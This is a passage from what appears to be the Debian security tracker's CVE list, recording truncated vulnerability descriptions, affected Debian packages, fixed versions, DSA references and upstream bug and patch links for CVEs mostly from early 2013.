CVE-2013-1668 RESERVED
CVE-2013-1667 (The rehash mechanism in Perl 5.8.2 through 5.16.x allows ...)
	{DSA-2641-1}
	- perl 5.14.2-19 (bug #702296)
	NOTE: http://www.nntp.perl.org/group/perl.perl5.porters/2013/03/msg199755.html
CVE-2013-1666 RESERVED
	- foswiki (bug #509864)
CVE-2013-1665 (The XML libraries for Python 3.4, 3.3, 3.2, 3.1, 2.7, and 2.6, as used ...)
	{DSA-2634-1}
	- keystone 2012.1.1-13 (bug #700948)
	- python-django 1.4.4-1
CVE-2013-1664 (The XML libraries for Python 3.4, 3.3, 3.2, 3.1, 2.7, and 2.6, as used ...)
	- keystone 2012.1.1-13 (bug #700948)
	- nova 2012.1.1-13 (bug #700949)
	- cinder 2012.2.3-1 (bug #700950)
CVE-2012-6532 ((1) Zend_Dom, (2) Zend_Feed, (3) Zend_Soap, and (4) Zend_XmlRpc in ...)
	- zendframework 1.11.13-1
CVE-2012-6531 ((1) Zend_Dom, (2) Zend_Feed, and (3) Zend_Soap in Zend Framework 1.x ...)
	- zendframework 1.11.13-1
CVE-2013-1663 RESERVED
CVE-2013-1662 RESERVED
CVE-2013-1661 RESERVED
CVE-2013-1660 RESERVED
CVE-2013-1659 (VMware vCenter Server 4.0 before Update 4b, 5.0 before Update 2, and ...)
	NOT-FOR-US: vCenter
CVE-2013-1658 RESERVED
CVE-2013-1657 RESERVED
CVE-2011-5265 (Cross-site scripting (XSS) vulnerability in cached_image.php in the ...)
	NOT-FOR-US: WordPress plugin
CVE-2011-5264 (Cross-site scripting (XSS) vulnerability in lazyest-backup.php in the ...)
	NOT-FOR-US: WordPress plugin
CVE-2011-5263 (Cross-site scripting (XSS) vulnerability in RetrieveMailExamples in ...)
	NOT-FOR-US: SAP NetWeaver
CVE-2011-5262 (SQL injection vulnerability in prodpage.cfm in SonicWALL Aventail ...)
	NOT-FOR-US: SonicWALL Aventail
CVE-2011-5261 (Cross-site scripting (XSS) vulnerability in serverreport.cgi in Axis ...)
	NOT-FOR-US: Axis M10 Series Network Cameras
CVE-2011-5260 (Cross-site scripting (XSS) vulnerability in SAP/BW/DOC/METADATA in SAP ...)
	NOT-FOR-US: NetWeaver
CVE-2011-5259 (SQL injection vulnerability in lib/controllers/CentralController.php ...)
	NOT-FOR-US: OrangeHRM
CVE-2011-5258 (Multiple cross-site scripting (XSS) vulnerabilities in OrangeHRM ...)
	NOT-FOR-US: OrangeHRM
CVE-2011-5257 (Multiple cross-site scripting (XSS) vulnerabilities in the Classipress ...)
	NOT-FOR-US: WordPress theme
CVE-2011-5256 (Cross-site scripting (XSS) vulnerability in the tooltips in LimeSurvey ...)
	- limesurvey (bug #472802)
CVE-2013-1656 (Spree Commerce 1.0.x through 1.3.2 allow remote authenticated ...)
	NOT-FOR-US: Spree
CVE-2013-1655 (Puppet 2.7.x before 2.7.21 and 3.1.x before 3.1.1, when running Ruby ...)
	{DSA-2643-1}
	- puppet 2.7.18-3
CVE-2013-1654 (Puppet 2.7.x before 2.7.21 and 3.1.x before 3.1.1, and Puppet ...)
	{DSA-2643-1}
	- puppet 2.7.18-3
CVE-2013-1653 (Puppet before 2.6.18, 2.7.x before 2.7.21, and 3.1.x before 3.1.1, and ...)
	{DSA-2643-1}
	- puppet 2.7.18-3
CVE-2013-1652 (Puppet before 2.6.18, 2.7.x before 2.7.21, and 3.1.x before 3.1.1, and ...)
	{DSA-2643-1}
	- puppet 2.7.18-3
CVE-2013-1651 RESERVED
CVE-2013-1650 RESERVED
CVE-2013-1649 RESERVED
CVE-2013-1648 RESERVED
CVE-2013-1647 RESERVED
CVE-2013-1646 RESERVED
	NOT-FOR-US: Open-Xchange
CVE-2013-1645 RESERVED
CVE-2013-1644 RESERVED
CVE-2013-1643 (The SOAP parser in PHP before 5.3.22 and 5.4.x before 5.4.13 allows ...)
	{DSA-2639-1}
	- php5 5.4.4-14 (bug #702221)
	NOTE: http://git.php.net/?p=php-src.git;a=commitdiff;h=c737b89473df9dba6742b8fc8fbf6d009bf05c36
CVE-2013-1642 RESERVED
CVE-2013-1641 RESERVED
CVE-2013-1640 (The (1) template and (2) inline_template functions in the master ...)
	{DSA-2643-1}
	- puppet 2.7.18-3
CVE-2013-1639 (Opera before 12.13 does not send CORS preflight requests in all ...)
	NOT-FOR-US: Opera
CVE-2013-1638 (Opera before 12.13 allows remote attackers to execute arbitrary code ...)
	NOT-FOR-US: Opera
CVE-2013-1637 (Opera before 12.13 allows remote attackers to execute arbitrary code ...)
	NOT-FOR-US: Opera
CVE-2013-1636 RESERVED
CVE-2013-1635 (ext/soap/soap.c in PHP before 5.3.22 and 5.4.x before 5.4.13 does not ...)
	{DSA-2639-1}
	- php5 5.4.4-14 (unimportant; bug #702221)
	NOTE: open_basedir not supported
	NOTE: http://git.php.net/?p=php-src.git;a=commitdiff;h=702b436ef470cc02f8e2cc21f2fadeee42103c74
CVE-2013-1634 RESERVED
CVE-2013-1633 RESERVED
CVE-2013-1632 RESERVED
CVE-2013-1631 RESERVED
CVE-2013-1630 RESERVED
CVE-2013-1629 RESERVED
CVE-2013-1628 RESERVED
CVE-2013-1627 (Absolute path traversal vulnerability in NTWebServer.exe in Indusoft ...)
	NOT-FOR-US: Indusoft Studio, Advantech Studio
CVE-2013-1626 RESERVED
CVE-2013-1625 RESERVED
CVE-2013-1624 (The TLS implementation in the Bouncy Castle Java library before 1.48 ...)
	- bouncycastle 1.48+dfsg-2 (low; bug #699885)
	[squeeze] - bouncycastle (Minor issue)
	[wheezy] - bouncycastle (Minor issue)
CVE-2013-1623 (The TLS and DTLS implementations in wolfSSL CyaSSL before 2.5.0 do not ...)
	- mysql-5.1
	- mysql-5.5 5.5.30+dfsg-1.1 (bug #699886)
	- cyassl (bug #598391)
	- libyassl (bug #664533)
CVE-2013-1622 REJECTED
CVE-2013-1621 (Array index error in the SSL module in PolarSSL before 1.2.5 might ...)
	{DSA-2622-1}
	- polarssl 1.1.4-2 (bug #699887)
CVE-2013-1620 (The TLS implementation in Mozilla Network Security Services (NSS) does ...)
	- nss 2:3.14.3-1 (bug #699888)
CVE-2013-1619 (The TLS implementation in GnuTLS before 2.12.23, 3.0.x before 3.0.28, ...)
	- gnutls26 2.12.20-4
	- gnutls28 3.0.22-3
CVE-2013-1618 (The TLS implementation in Opera before 12.13 does not properly ...)
	NOT-FOR-US: Opera
CVE-2013-1617 RESERVED
CVE-2013-1616 RESERVED
CVE-2013-1615 RESERVED
CVE-2013-1614 RESERVED
CVE-2013-1613 RESERVED
CVE-2013-1612 RESERVED
CVE-2013-1611 (Multiple cross-site scripting (XSS) vulnerabilities in ...)
	NOT-FOR-US: Symantec Brightmail Gateway
CVE-2013-1610 RESERVED
CVE-2013-1609 (Multiple unquoted Windows search path vulnerabilities in the (1) File ...)
	NOT-FOR-US: Symantec
CVE-2013-1608 (Directory traversal vulnerability in the Management Console on the ...)
	NOT-FOR-US: Symantec
CVE-2013-1607 RESERVED
CVE-2013-1606 RESERVED
CVE-2013-1605 RESERVED
CVE-2013-1604 RESERVED
CVE-2013-1603 RESERVED
CVE-2013-1602 RESERVED
CVE-2013-1601 RESERVED
CVE-2013-1600 RESERVED
CVE-2013-1599 RESERVED
CVE-2013-1598 RESERVED
CVE-2013-1597 RESERVED
CVE-2013-1596 RESERVED
CVE-2013-1595 RESERVED
CVE-2013-1594 RESERVED
CVE-2013-1593 RESERVED
CVE-2013-1592 RESERVED
CVE-2013-1591 (Stack-based buffer overflow in libpixman, as used in Pale Moon before ...)
	- pixman 0.26.0-4 (bug #700308)
	[squeeze] - pixman (Vulnerable code not present)
CVE-2013-1590 (Buffer overflow in the NTLMSSP dissector in Wireshark 1.6.x before ...)
	{DSA-2625-1}
	- wireshark 1.8.6-1
	[wheezy] - wireshark 1.8.2-5wheezy1
CVE-2013-1589 (Double free vulnerability in epan/proto.c in the dissection engine in ...)
	- wireshark 1.8.6-1 (unimportant)
	[wheezy] - wireshark 1.8.2-5wheezy1
	NOTE: Not suitable for code injection
CVE-2013-1588 (Multiple buffer overflows in the dissect_pft_fec_detailed function in ...)
	{DSA-2625-1}
	- wireshark 1.8.6-1
	[wheezy] - wireshark 1.8.2-5wheezy1
	NOTE: Upstream bug: https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=8213
	NOTE: Upstream patch: http://anonsvn.wireshark.org/viewvc?view=revision&revision=47098
CVE-2013-1587 (The dissect_rohc_ir_packet function in epan/dissectors/packet-rohc.c ...)
	- wireshark 1.8.6-1
	[squeeze] - wireshark (Vulnerable code not present)
	[wheezy] - wireshark 1.8.2-5wheezy1
	NOTE: Upstream bug: https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=7679
	NOTE: Upstream patch: http://anonsvn.wireshark.org/viewvc?view=revision&revision=44700
CVE-2013-1586 (The fragment_set_tot_len function in epan/reassemble.c in Wireshark ...)
	{DSA-2625-1}
	- wireshark 1.8.6-1
	[wheezy] - wireshark 1.8.2-5wheezy1
	NOTE: Upstream bug: https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=8111
	NOTE: http://anonsvn.wireshark.org/viewvc?view=revision&revision=46999
	NOTE: http://anonsvn.wireshark.org/viewvc?view=revision&revision=47000
CVE-2013-1585 (epan/tvbuff.c in Wireshark 1.6.x before 1.6.13 and 1.8.x before 1.8.5 ...)
	- wireshark 1.8.6-1
	[squeeze] - wireshark (Vulnerable code not present)
	[wheezy] - wireshark 1.8.2-5wheezy1
	NOTE: Upstream bug: https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=8112
	NOTE: http://anonsvn.wireshark.org/viewvc?view=revision&revision=46705
	NOTE: http://anonsvn.wireshark.org/viewvc?view=revision&revision=46678
CVE-2013-1584 (The dissect_version_5_and_6_primary_header function in ...)
	- wireshark 1.8.6-1
	[squeeze] - wireshark (Vulnerable code not present)
	[wheezy] - wireshark 1.8.2-5wheezy1
	NOTE: Upstream bug: https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=7945
	NOTE: http://anonsvn.wireshark.org/viewvc?view=revision&revision=46579
CVE-2013-1583 (The dissect_version_4_primary_header function in ...)
	- wireshark 1.8.6-1
	[squeeze] - wireshark (Vulnerable code not present)
	[wheezy] - wireshark 1.8.2-5wheezy1
	NOTE: Upstream bug: https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=7945
	NOTE: http://anonsvn.wireshark.org/viewvc?view=revision&revision=46577
CVE-2013-1582 (The dissect_clnp function in epan/dissectors/packet-clnp.c in the CLNP ...)
	{DSA-2625-1}
	- wireshark 1.8.6-1
	[wheezy] - wireshark 1.8.2-5wheezy1
	NOTE: Upstream bug: https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=7871
	NOTE: http://anonsvn.wireshark.org/viewvc?view=revision&revision=45646
CVE-2013-1571 RESERVED
CVE-2013-1570 (Unspecified vulnerability in Oracle MySQL 5.6.10 and earlier allows ...)
	- mysql-5.5 (Only affects MySQL 5.6)
	- mysql-5.1 (Only affects MySQL 5.6)
CVE-2013-1569 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...)
	- openjdk-7 7u21-2.3.9-1
	- openjdk-6 6b27-1.12.5-1
CVE-2013-1568 (Unspecified vulnerability in the Oracle FLEXCUBE Direct Banking ...)
	NOT-FOR-US: Oracle Financial Services Software
CVE-2013-1567 (Unspecified vulnerability in Oracle MySQL 5.6.10 and earlier allows ...)
	- mysql-5.5 (Only affects MySQL 5.6)
	- mysql-5.1 (Only affects MySQL 5.6)
CVE-2013-1566 (Unspecified vulnerability in Oracle MySQL 5.6.10 and earlier allows ...)
	- mysql-5.5 (Only affects MySQL 5.6)
	- mysql-5.1 (Only affects MySQL 5.6)
CVE-2013-1565 (Unspecified vulnerability in the Oracle GoldenGate Veridata component ...)
	NOT-FOR-US: Oracle Fusion Middleware
CVE-2013-1564 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...)
	- openjdk-6 (JavaFX not part of OpenJDK)
	- openjdk-7 (JavaFX not part of OpenJDK)
CVE-2013-1563 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...)
	- openjdk-6 (Installation component of Oracle Java doesn't apply to IcedTea/OpenJDK)
	- openjdk-7 (Installation component of Oracle Java doesn't apply to IcedTea/OpenJDK)
CVE-2013-1562 (Unspecified vulnerability in the Oracle FLEXCUBE Direct Banking ...)
	NOT-FOR-US: Oracle Financial Services
CVE-2013-1561 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...)
	- openjdk-6 (JavaFX not part of OpenJDK)
	- openjdk-7 (JavaFX not part of OpenJDK)
CVE-2013-1560 (Unspecified vulnerability in the Oracle FLEXCUBE Direct Banking ...)
	NOT-FOR-US: Oracle Financial Services
CVE-2013-1559 (Unspecified vulnerability in the Oracle WebCenter Content component in ...)
	NOT-FOR-US: Oracle Fusion Middleware
CVE-2013-1558 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...)
	- openjdk-7 7u21-2.3.9-1
	- openjdk-6 6b27-1.12.5-1
CVE-2013-1557 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...)
	- openjdk-7 7u21-2.3.9-1
	- openjdk-6 6b27-1.12.5-1
CVE-2013-1556 (Unspecified vulnerability in the Oracle FLEXCUBE Direct Banking ...)
	NOT-FOR-US: Oracle Financial Services Software
CVE-2013-1555 (Unspecified vulnerability in MySQL 5.1.67 and earlier and 5.5.29 and ...)
	- mysql-5.5 5.5.30+dfsg-1
	- mysql-5.1
CVE-2013-1554 (Unspecified vulnerability in the Network Layer component in Oracle ...)
	NOT-FOR-US: Oracle Database Server
CVE-2013-1553 (Unspecified vulnerability in the Oracle Web Services Manager component ...)
	NOT-FOR-US: Oracle Fusion Middleware
CVE-2013-1552 (Unspecified vulnerability in Oracle MySQL 5.1.67 and earlier and ...)
	- mysql-5.5 5.5.30+dfsg-1
	- mysql-5.1
CVE-2013-1551 (Unspecified vulnerability in the Siebel Enterprise Application ...)
	NOT-FOR-US: Oracle Siebel CRM
CVE-2013-1550 (Unspecified vulnerability in the PeopleSoft Enterprise PeopleTools ...)
	NOT-FOR-US: Oracle PeopleSoft Products
CVE-2013-1549 (Unspecified vulnerability in the Oracle FLEXCUBE Direct Banking ...)
	NOT-FOR-US: Oracle Financial Services Software
CVE-2013-1548 (Unspecified vulnerability in Oracle MySQL 5.1.63 and earlier allows ...)
	- mysql-5.5 (Only affects MySQL 5.1)
	- mysql-5.1
CVE-2013-1547 (Unspecified vulnerability in the Oracle FLEXCUBE Direct Banking ...)
	NOT-FOR-US: Oracle Financial Services Software
CVE-2013-1546 (Unspecified vulnerability in the Oracle FLEXCUBE Direct Banking ...)
	NOT-FOR-US: Oracle Financial Services Software
CVE-2013-1545 (Unspecified vulnerability in the Oracle HTTP Server component in ...)
	NOT-FOR-US: Oracle Fusion Middleware
CVE-2013-1544 (Unspecified vulnerability in Oracle MySQL 5.1.68 and earlier, 5.5.30 ...)
	{DSA-2667-1}
	- mysql-5.5 5.5.31+dfsg-1
	- mysql-5.1
CVE-2013-1543 (Unspecified vulnerability in the Siebel UI Framework component in ...)
	NOT-FOR-US: Oracle Siebel CRM
CVE-2013-1542 (Unspecified vulnerability in the Oracle Containers for J2EE component ...)
	NOT-FOR-US: Oracle Fusion Middleware
CVE-2013-1541 (Unspecified vulnerability in the Oracle FLEXCUBE Direct Banking ...)
	NOT-FOR-US: Oracle Financial Services
CVE-2013-1540 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...)
	- openjdk-6 (Deployment components not part of OpenJDK, only present in Oracle Java)
	- openjdk-7 (Deployment components not part of OpenJDK, only present in Oracle Java)
CVE-2013-1539 (Unspecified vulnerability in the Oracle FLEXCUBE Direct Banking ...)
	NOT-FOR-US: Oracle Financial Services
CVE-2013-1538 (Unspecified vulnerability in the Network Layer component in Oracle ...)
	NOT-FOR-US: Oracle Database Server
CVE-2013-1537 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...)
	- openjdk-7 7u21-2.3.9-1
	- openjdk-6 6b27-1.12.5-1
CVE-2013-1536 (Unspecified vulnerability in the Oracle Transportation Management ...)
	NOT-FOR-US: Oracle Supply Chain Products
CVE-2013-1535 (Unspecified vulnerability in the Oracle FLEXCUBE Direct Banking ...)
	NOT-FOR-US: Oracle Financial Services Software
CVE-2013-1534 (Unspecified vulnerability in the Workload Manager component in Oracle ...)
	NOT-FOR-US: Oracle Database Server
CVE-2013-1533 (Unspecified vulnerability in the Oracle FLEXCUBE Direct Banking ...)
	NOT-FOR-US: Oracle Financial Services Software
CVE-2013-1532 (Unspecified vulnerability in Oracle MySQL 5.1.68 and earlier, 5.5.30 ...)
	{DSA-2667-1}
	- mysql-5.5 5.5.31+dfsg-1
	- mysql-5.1
CVE-2013-1531 (Unspecified vulnerability in Oracle MySQL 5.1.66 and earlier and ...)
	- mysql-5.5 5.5.30+dfsg-1
	- mysql-5.1
CVE-2013-1530 (Unspecified vulnerability in Oracle Sun Solaris 10 allows local users ...)
	NOT-FOR-US: Oracle Solaris
CVE-2013-1529 (Unspecified vulnerability in the Oracle WebCenter Interaction ...)
	NOT-FOR-US: Oracle Fusion Middleware
CVE-2013-1528 (Unspecified vulnerability in the Oracle HRMS component in Oracle ...)
	NOT-FOR-US: Oracle E-Business Suite
CVE-2013-1527 (Unspecified vulnerability in the PeopleSoft Enterprise PeopleTools ...)
	NOT-FOR-US: Oracle PeopleSoft Products
CVE-2013-1526 (Unspecified vulnerability in Oracle MySQL 5.5.29 and earlier allows ...)
	- mysql-5.5 5.5.30+dfsg-1
	- mysql-5.1 (Only affects MySQL 5.5)
CVE-2013-1525 (Unspecified vulnerability in the Oracle Retail Integration Bus ...)
	NOT-FOR-US: Oracle Industry Applications
CVE-2013-1524 (Unspecified vulnerability in the Oracle Application Object Library ...)
	NOT-FOR-US: Oracle E-Business Suite
CVE-2013-1523 (Unspecified vulnerability in Oracle MySQL 5.5.29 and earlier and ...)
	- mysql-5.5
	- mysql-5.1 (Only affects MySQL 5.5 and 5.6)
CVE-2013-1522 (Unspecified vulnerability in the Oracle WebCenter Content component in ...)
	NOT-FOR-US: Oracle Fusion Middleware
CVE-2013-1521 (Unspecified vulnerability in Oracle MySQL 5.1.67 and earlier and ...)
	- mysql-5.5 5.5.30+dfsg-1
	- mysql-5.1
CVE-2013-1520 (Unspecified vulnerability in the Oracle Clinical Remote Data Capture ...)
	NOT-FOR-US: Oracle Industry Applications
CVE-2013-1519 (Unspecified vulnerability in the Application Express component in ...)
	NOT-FOR-US: Oracle Database Server
CVE-2013-1518 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...)
	- openjdk-7 7u21-2.3.9-1
	- openjdk-6 6b27-1.12.5-1
CVE-2013-1517 (Unspecified vulnerability in the Oracle Application Object Library ...)
	NOT-FOR-US: Oracle E-Business Suite
CVE-2013-1516 (Unspecified vulnerability in the Oracle WebCenter Capture component in ...)
	NOT-FOR-US: Oracle Fusion Middleware
CVE-2013-1515 (Unspecified vulnerability in the Oracle GlassFish Server component in ...)
	- glassfish (Only affects 3.x)
CVE-2013-1514 (Unspecified vulnerability in the Oracle Containers for J2EE component ...)
	NOT-FOR-US: Oracle Fusion Middleware
CVE-2013-1513 (Unspecified vulnerability in the PeopleSoft Enterprise PeopleTools ...)
	NOT-FOR-US: Oracle PeopleSoft Products
CVE-2013-1512 (Unspecified vulnerability in Oracle MySQL 5.5.29 and earlier allows ...)
	- mysql-5.5 5.5.30+dfsg-1
	- mysql-5.1 (Only affects MySQL 5.5)
CVE-2013-1511 (Unspecified vulnerability in Oracle MySQL 5.5.30 and earlier and ...)
	{DSA-2667-1}
	- mysql-5.5 5.5.31+dfsg-1
	- mysql-5.1 (Only affects MySQL 5.5 and 5.6)
CVE-2013-1510 (Unspecified vulnerability in the Siebel UI Framework component in ...)
	NOT-FOR-US: Oracle Siebel
CVE-2013-1509 (Unspecified vulnerability in the Oracle WebCenter Sites component in ...)
	NOT-FOR-US: Oracle Fusion
CVE-2013-1508 (Unspecified vulnerability in the Oracle GlassFish Server component in ...)
	- glassfish (Only affects 3.x)
CVE-2013-1507 (Unspecified vulnerability in Oracle Sun Solaris 10 and 11 allows local ...)
	NOT-FOR-US: Solaris
CVE-2013-1506 (Unspecified vulnerability in Oracle MySQL 5.1.67 and earlier, 5.5.29 ...)
	- mysql-5.5 5.5.30+dfsg-1
	- mysql-5.1
CVE-2013-1505 (Unspecified vulnerability in the Oracle FLEXCUBE Direct Banking ...)
	NOT-FOR-US: Oracle FLEXCUBE
CVE-2013-1504 (Unspecified vulnerability in the Oracle WebLogic Server component in ...)
	NOT-FOR-US: Oracle Fusion
CVE-2013-1503 (Unspecified vulnerability in the Oracle WebCenter Content component in ...)
	NOT-FOR-US: Oracle Fusion
CVE-2013-1502 (Unspecified vulnerability in Oracle MySQL 5.5.30 and earlier and 5.6.9 ...)
	{DSA-2667-1}
	- mysql-5.5 5.5.31+dfsg-1
	- mysql-5.1 (Only affects MySQL 5.5 and 5.6)
CVE-2013-1501 (Unspecified vulnerability in the Oracle iStore component in Oracle ...)
	NOT-FOR-US: Oracle E-Business Suite
CVE-2013-1500 RESERVED
CVE-2013-1499 (Unspecified vulnerability in Oracle Sun Solaris 11 allows local users ...)
	NOT-FOR-US: Solaris
CVE-2013-1498 (Unspecified vulnerability in Oracle Sun Solaris 10 and 11 allows local ...)
	NOT-FOR-US: Solaris
CVE-2013-1497 (Unspecified vulnerability in the Oracle COREid Access component in ...)
	NOT-FOR-US: Oracle Fusion
CVE-2013-1496 (Unspecified vulnerability in Oracle Sun Solaris 10 and 11 allows local ...)
	NOT-FOR-US: Solaris
CVE-2013-1495 (asr in Oracle Auto Service Request in Oracle Support Tools before ...)
	NOT-FOR-US: Oracle Auto Service Request
CVE-2013-1494 (Unspecified vulnerability in Oracle Sun Solaris 10, when running on ...)
	NOT-FOR-US: Solaris
CVE-2013-1493 (The color management (CMM) functionality in the 2D component in Oracle ...)
	- openjdk-6 6b27-1.12.4-1
	- openjdk-7 7u3-2.1.7-1
CVE-2013-1492 (Buffer overflow in yaSSL, as used in MySQL 5.1.x before 5.1.68 and ...)
	- mysql-5.1
	- mysql-5.5 5.5.30+dfsg-1
	- cyassl (bug #598391)
	- libyassl (bug #664533)
	NOTE: https://blogs.oracle.com/sunsecurity/entry/cve_2013_1492_buffer_overflow
CVE-2013-1491 (The Java Runtime Environment (JRE) component in Oracle Java SE 7 ...)
	- openjdk-6 (Specific to Oracle Java, not present in IcedTea)
	- openjdk-7 (Specific to Oracle Java, not present in IcedTea)
	NOTE: Due to Oracle's vague disclosure policy the exact nature is unknown, but since no patch landed in IcedTea, we consider it not-affected
CVE-2013-1490 (Unspecified vulnerability in Oracle Java SE 7 Update 11 (JRE ...)
	- openjdk-6 (Not exploitable in OpenJDK6)
	- openjdk-7
CVE-2013-1489 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...)
	- openjdk-6 (Only affects Java7)
	- openjdk-7 (Deployment components not part of OpenJDK, only present in Oracle Java)
CVE-2013-1488 (The Java Runtime Environment (JRE) component in Oracle Java SE 7 ...)
	- openjdk-7 7u21-2.3.9-1
	- openjdk-6 (Only affects Java7)
CVE-2013-1487 (Unspecified vulnerability in the Java Runtime Environment component in ...)
	- openjdk-6 (Deployment components not part of OpenJDK, only present in Oracle Java)
	- openjdk-7 (Deployment components not part of OpenJDK, only present in Oracle Java)
CVE-2013-1486 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...)
	- openjdk-7 7u3-2.1.6-1
	- openjdk-6 6b27-1.12.3-1
CVE-2013-1485 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...)
	- openjdk-7 7u3-2.1.6-1
	- openjdk-6 (Only affects Java7)
CVE-2013-1484 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...)
	- openjdk-7 7u3-2.1.6-1
	- openjdk-6 (Only affects Java7)
CVE-2013-1483 (Unspecified vulnerability in the JavaFX component in Oracle Java SE ...)
	- openjdk-6 (JavaFX not part of OpenJDK)
	- openjdk-7 (JavaFX not part of OpenJDK)
CVE-2013-1482 (Unspecified vulnerability in the JavaFX component in Oracle Java SE ...)
	- openjdk-6 (JavaFX not part of OpenJDK)
	- openjdk-7 (JavaFX not part of OpenJDK)
CVE-2013-1481 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...)
	- openjdk-6 (IcedTea uses a different sound implementation than Oracle Java)
	- openjdk-7 (IcedTea uses a different sound implementation than Oracle Java)
CVE-2013-1480 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...)
	- openjdk-6 6b27-1.12-1
	- openjdk-7 7u3-2.1.6-1
CVE-2013-1479 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...)
	- openjdk-6 (JavaFX not part of OpenJDK)
	- openjdk-7 (JavaFX not part of OpenJDK)
CVE-2013-1478 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...)
	- openjdk-6 6b27-1.12-1
	- openjdk-7 7u3-2.1.6-1
CVE-2013-1477 (Unspecified vulnerability in the JavaFX component in Oracle Java SE ...)
	- openjdk-6 (JavaFX not part of OpenJDK)
	- openjdk-7 (JavaFX not part of OpenJDK)
CVE-2013-1476 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...)
	- openjdk-6 6b27-1.12-1
	- openjdk-7 7u3-2.1.6-1
CVE-2013-1475 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...)
	- openjdk-6 6b27-1.12-1
	- openjdk-7 7u3-2.1.6-1
CVE-2013-1474 (Unspecified vulnerability in the JavaFX component in Oracle Java SE ...)
	- openjdk-6 (JavaFX not part of OpenJDK)
	- openjdk-7 (JavaFX not part of OpenJDK)
CVE-2013-1473 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...)
	- openjdk-6 (Deployment components not part of OpenJDK, only present in Oracle Java)
	- openjdk-7 (Deployment components not part of OpenJDK, only present in Oracle Java)
CVE-2013-1472 (Unspecified vulnerability in the JavaFX component in Oracle Java SE ...)
	- openjdk-6 (JavaFX not part of OpenJDK)
	- openjdk-7 (JavaFX not part of OpenJDK)
CVE-2013-1471 (Multiple cross-site scripting (XSS) vulnerabilities in ...)
	NOT-FOR-US: Fortinet FortiMail
CVE-2012-6530 (Stack-based buffer overflow in Sysax Multi Server before 5.52, when ...)
	NOT-FOR-US: Sysax Multi Server
CVE-2012-6529 (Multiple SQL injection vulnerabilities in Marinet CMS allow remote ...)
	NOT-FOR-US: Marinet CMS
CVE-2012-6528 (Multiple cross-site scripting (XSS) vulnerabilities in ATutor before ...)
	NOT-FOR-US: ATutor
CVE-2012-6527 (Cross-site scripting (XSS) vulnerability in the My Calendar plugin ...)
	NOT-FOR-US: WordPress plugin My Calendar
CVE-2012-6526 (SQL injection vulnerability in show_code.php in Vastal I-Tech ...)
	NOT-FOR-US: Vastal I-Tech Freelance Zone
CVE-2012-6525 (SQL injection vulnerability in members.php in PHPBridges allows remote ...)
	NOT-FOR-US: PHPBridges
CVE-2012-6524 (SQL injection vulnerability in kommentar.php in pGB 2.12 allows remote ...)
	NOT-FOR-US: pGB
CVE-2012-6523 (Multiple cross-site scripting (XSS) vulnerabilities in w-CMS 2.01 ...)
	NOT-FOR-US: w-CMS 2.01
CVE-2012-6522 (Directory traversal vulnerability in the getContent function in ...)
	NOT-FOR-US: w-CMS 2.01
CVE-2011-5255 (Multiple cross-site scripting (XSS) vulnerabilities in admin/login in ...)
	NOT-FOR-US: X3 CMS
CVE-2010-5287 (SQL injection vulnerability in default.php in Cornerstone Technologies ...)
	NOT-FOR-US: Cornerstone Technologies webConductor
CVE-2013-1581 (The dissect_pft_fec_detailed function in ...)
	- wireshark (unimportant)
	NOTE: Not suitable for code injection
CVE-2013-1580 (The dissect_cmstatus_tlv function in plugins/docsis/packet-cmstatus.c ...)
	- wireshark (unimportant)
	NOTE: Not suitable for code injection
CVE-2013-1579 (The rtps_util_add_bitmap function in epan/dissectors/packet-rtps.c in ...)
	- wireshark (unimportant)
	NOTE: Not suitable for code injection
CVE-2013-1578 (The dissect_pw_eth_heuristic function in ...)
	- wireshark (unimportant)
	NOTE: Not suitable for code injection
CVE-2013-1577 (The dissect_sip_p_charging_func_addresses function in ...)
	- wireshark (unimportant)
	NOTE: Not suitable for code injection
CVE-2013-1576 (The dissect_sdp_media_attribute function in ...)
	- wireshark (unimportant)
	NOTE: Not suitable for code injection
CVE-2013-1575 (The dissect_r3_cmd_alarmconfigure function in ...)
	- wireshark (unimportant)
	NOTE: Not suitable for code injection
CVE-2013-1574 (The dissect_bthci_eir_ad_data function in ...)
	- wireshark (unimportant)
	NOTE: Not suitable for code injection
CVE-2013-1573 (The csnStreamDissector function in epan/dissectors/packet-csn1.c in ...)
	- wireshark (unimportant)
	NOTE: Not suitable for code injection
CVE-2013-1572 (The dissect_oampdu_event_notification function in ...)
	- wireshark (unimportant)
	NOTE: Not suitable for code injection
CVE-2013-1470 [XSS in geeklog]
	RESERVED
	NOTE: There was an RFP a long time ago, bug #203818
	NOTE: https://www.htbridge.com/advisory/HTB23143
	NOT-FOR-US: Geeklog
CVE-2013-1469 (Directory traversal vulnerability in install.php in Piwigo before ...)
	- piwigo
	NOTE: https://www.htbridge.com/advisory/HTB23144
CVE-2013-1468 (Cross-site request forgery (CSRF) vulnerability in the LocalFiles ...)
	- piwigo
	NOTE: https://www.htbridge.com/advisory/HTB23144
CVE-2013-1467 RESERVED
CVE-2013-1466 RESERVED
CVE-2013-1465 (The Cubecart::_basket method in classes/cubecart.class.php in CubeCart ...)
	NOT-FOR-US: CubeCart
CVE-2013-1464 (Cross-site scripting (XSS) vulnerability in ssets/player.swf in the ...)
	NOT-FOR-US: WordPress plugin
CVE-2013-1463 (Cross-site scripting (XSS) vulnerability in ...)
	NOT-FOR-US: WordPress plugin
